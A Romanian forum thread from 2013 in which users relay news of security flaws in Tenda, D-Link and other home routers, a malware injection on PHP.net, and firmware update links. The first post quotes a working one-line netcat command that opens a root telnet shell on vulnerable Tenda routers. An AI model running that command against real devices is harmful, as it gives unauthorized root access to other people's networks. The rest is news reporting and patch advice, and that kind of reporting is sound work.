Probleme de securitate

PC
User avatar
Levy
Gold User
Posts: 1581
Joined: 02 Oct 2013 15:07
Location: ABSURDISTAN

Probleme de securitate

Unread postby Levy » 19 Oct 2013 18:06

Thehackernew.com anunta probleme de securitate in routerele wireless TENDA de fabricatie chinezeasca.
Conform acestor surse se poate cu o singura linie de comanda acesa ca root user routerul din exterior.

Code: Select all

echo -ne "w302r_mfg\x00x/bin/busybox telnetd" | nc -q 5 -u 7329 192.168.0.1


Image

Mai multe detalii aici.

Cei care au acest tip de router pot confirma sau infirma ce se scrie acolo.
Dacă ai tăiat și ultimul copac, ai otrăvit și ultimul râu și ai prins și ultimul pește, ai să fi uimit să constați că banii nu sunt comestibili !

Image
User avatar
stargate
Platinum User
Posts: 2848
Joined: 11 Sep 2013 22:01
Location: P3X-888

Re: Probleme de securitate

Unread postby stargate » 19 Oct 2013 18:55

S-a descoperit o problema critica de securitate la routerele D-Link

Image



D-Link este o companie cu traditie care produce routere si modemuri pentru utilizatorii de internet si detine o mare parte din piata de profil. Totusi, recent s-a descoperit ca o serie de routere D-Link prezinta o problema critica de securitate. Aceast informatie cu privire la bresa de securitate a fost postata pe un site dedicate hackerilor si a fost decoperita dupa ce s-au facut modificari unei actualizari de firmware oferita de D-Link.

Problema consta in faptul ca se permite accesul oricarei persoane la pagina de configurare a routerului fara sa fie nevoie de un username si o parola prealabila. Persoana care a descoperit bresa sustine ca hackerii pot sa seteze browserul in asa fel incat sa poata accesa pagina de configurare a dispozitivului D-Link fara sa mai fie nevoie sa introduca elementele de securtate. Astfel, persoane neautorizate pot ajunge direct la optiunile de control ale routerului, ceea ce va permite fie introducerea de date false fie dezactivarea tuturor optiunilor de securitate.

Pentru a putea profita de aceasta vulnerabilitate, insa, hackerii trebuie sa fie direct conectati la router prin intermediul unei conexiuni Wi-Fi sau prin cablu Ethernet. Totusi, pagina de configurare este in mod public accesibila, ceea ce inseamna ca fraude se pot face si prin sisteme actionate de la distanta.

Aceasta problema grava a fost identificata la routerele care ruleaza firmware-ul cu versiunea 1.13. Modelele de router D-Link afectate sunt: DIR-100, DI-524, DI-524UP, DI-604S, DI-604UP, DI-604+ si TM-G5240. In ceea ce priveste o solutie pentru aceasta bresa, se pare ca nu exista nicio modalitate de protectie complete. Cele mai bune masuri care se pot lua sunt asigurarea ca dispozitivul ruleaza cel mai recent firmware si asigurarea ca pagina de configurare nu este accesibila in mod public.

Sursa: mobile-news.ro
Nota: Vizionarea programelor Pay TV fara un abonament valabil este ilegala
Discutiile purtate si fisierele disponibile aici sunt în scop experimental si educational !
User avatar
stargate
Platinum User
Posts: 2848
Joined: 11 Sep 2013 22:01
Location: P3X-888

Re: Probleme de securitate

Unread postby stargate » 19 Oct 2013 19:02

Routerele Wi-Fi: Mai multe riscuri de securitate decat oricand

Echipa de cercetare care a descoperit probleme de securitate semnificative in peste o duzina de routere Wi-Fi home adauga mai multe dispozitive pe lista, in cadrul Defcon 21.
Continua sa fie descoperite mai multe vulnerabilitati ale routerelor Wi-Fi ale marilor branduri, iar acestea continua sa ramana neremediate, a declarat un cercetator in domeniul securitatii, in cadrul Defcon 21.
Jake Holomb, cercetator in domeniul securitatii din cadrul firmei Independent Security Evaluators si principal cercetator al vulnerabilitatilor routerelor Wi-Fi, a declarat ca problema este mai grava decat a identificat-o ISE initial, in luna aprilie.
Cel mai recent studiu continua sa arate ca routerele Wi-Fi small office si home sunt "foarte vulnerabile la atacuri", a declarat Holomb. "Acestea nu sunt mijloace de a va proteja reteaua si bunurile digitale", a aratat Holomb.
Noul raport detaliaza 56 de noi vulnerabilitati si expuneri comune (CVE), pe care Holomb si ceilalti cercetatori le-au identificat in routerele populare. Acestea includ Asus RT-AC66U, D-Link DIR-865L si TrendNet TEW-812DRU, ale caror vulnerabilitati au fost prezentate de catre Holomb in cadrul Defcon, sambata si duminica.
Producatorii afectati nu au raspuns imediat solicitarii de a comenta subiectul.
Ati putea crede ca gaurile de securitate ale routerelor nu v-ar putea afecta sau ca acestea ar fi usor de exploatat, insa Holomb a explicat ca, deoarece aceste vulnerabilitati par sa afecteze majoritatea routerelor si sunt greu de remediat, ar putea prezenta riscuri pentru fiecare persoana care se conecteaza la un router vulnerabil.
Holomb a comparat problema remedierii routerelor cu PC-urile traditionale. "In majoritatea cazurilor, actualizarile automate sunt activate pentru Windows si Mac", a declarat acesta, adaugand ca "si in situatia in care un producator router ar implementa o caracteristica similara, majoritatea oamenilor nu s-ar loga in routerele lor". Practic, deoarece oamenii se gandesc la routere ca la dispozitive fara probleme de securitate, este aproape imposibil ca acestia sa fie determinati sa actualizeze firmware-ul router.
Remedierea nu va fi una usoara, cel putin nu din punct de vedere logistic. "Consider ca solutia este ca routerele sa fie actualizate automat si sa ofere utilizatorilor posibilitatea de a renunta la aceste actualizari", a declarat Holomb. Insa, avand in vedere reticenta majoritatii producatorilor de routere in ceea ce priveste remedierea problemei, aceste exploit-uri ar putea continua sa existe, neremediate, in urmatorii ani.
Holomb a precizat ca, in timp ce TP-Link a remediat toate vulnerabilitatile raportate de catre ISE, D-Link nu a raspuns niciodata, iar Linksys a ales sa nu remedieze multe dintre vulnerabilitatile raportate.
In conformitate cu liniile directoare in ceea ce priveste divulgarea, Holomb a declarat ca ISE a notificat toti producatorii de routere asupra vulnerabilitatilor descoperite, inainte de a le face publice, oferind acestora posibilitatea de a le remedia.

Sursa: smartnews.ro
Nota: Vizionarea programelor Pay TV fara un abonament valabil este ilegala
Discutiile purtate si fisierele disponibile aici sunt în scop experimental si educational !
User avatar
Levy
Gold User
Posts: 1581
Joined: 02 Oct 2013 15:07
Location: ABSURDISTAN

Re: Probleme de securitate

Unread postby Levy » 24 Oct 2013 17:42

The Hacker News
UPDATE : PHP.Net recovered back to normal after Google flagged it as "Malware Site".

Some malicious obfuscated JavaScripts were injected on PHP.NET website, those were serving hidden iframes, which loads content from an external site known for distributing malware.
Image

Read more: http://thehackernews.com/2013/10/google ... hpnet.html
Dacă ai tăiat și ultimul copac, ai otrăvit și ultimul râu și ai prins și ultimul pește, ai să fi uimit să constați că banii nu sunt comestibili !

Image
User avatar
delta2k2
Site Admin
Posts: 1990
Joined: 11 Sep 2013 15:18
Location: Over the rainbow ...

Re: Probleme de securitate

Unread postby delta2k2 » 28 Oct 2013 00:19

Multiple Vulnerabilities in D'Link DIR-600 and DIR-300 (rev B)

Vulnerable Firmware Releases - DIR-300:
Firmware Version : 2.12 - 18.01.2012
Firmware Version : 2.13 - 07.11.2012


Vulnerable Firmware Releases - DIR-600:
Firmware-Version : 2.12b02 - 17/01/2012
Firmware-Version : 2.13b01 - 07/11/2012
Firmware-Version : 2.14b01 - 22/01/2013

The vulnerability is caused by missing access restrictions and missing input validation in the cmd parameter and can be exploited to inject and execute arbitrary shell commands.
It is possible to start a telnetd to compromise the device. With this vulnerability an attacker is able to change the current password without knowing it. The attacker needs access to an authenticated browser.

===============================

Update de firmware găsiţi aici :
DIR-300 : http://www.dlink.com/ro/ro/support/prod ... n=deu_revb
DIR-600 : http://www.dlink.com/ro/ro/support/prod ... ome-router

===============================


O listă oficială cu routerele D-Link "afectate" aveţi aici

Return to “PC”

Who is online

Users browsing this forum: No registered users and 92 guests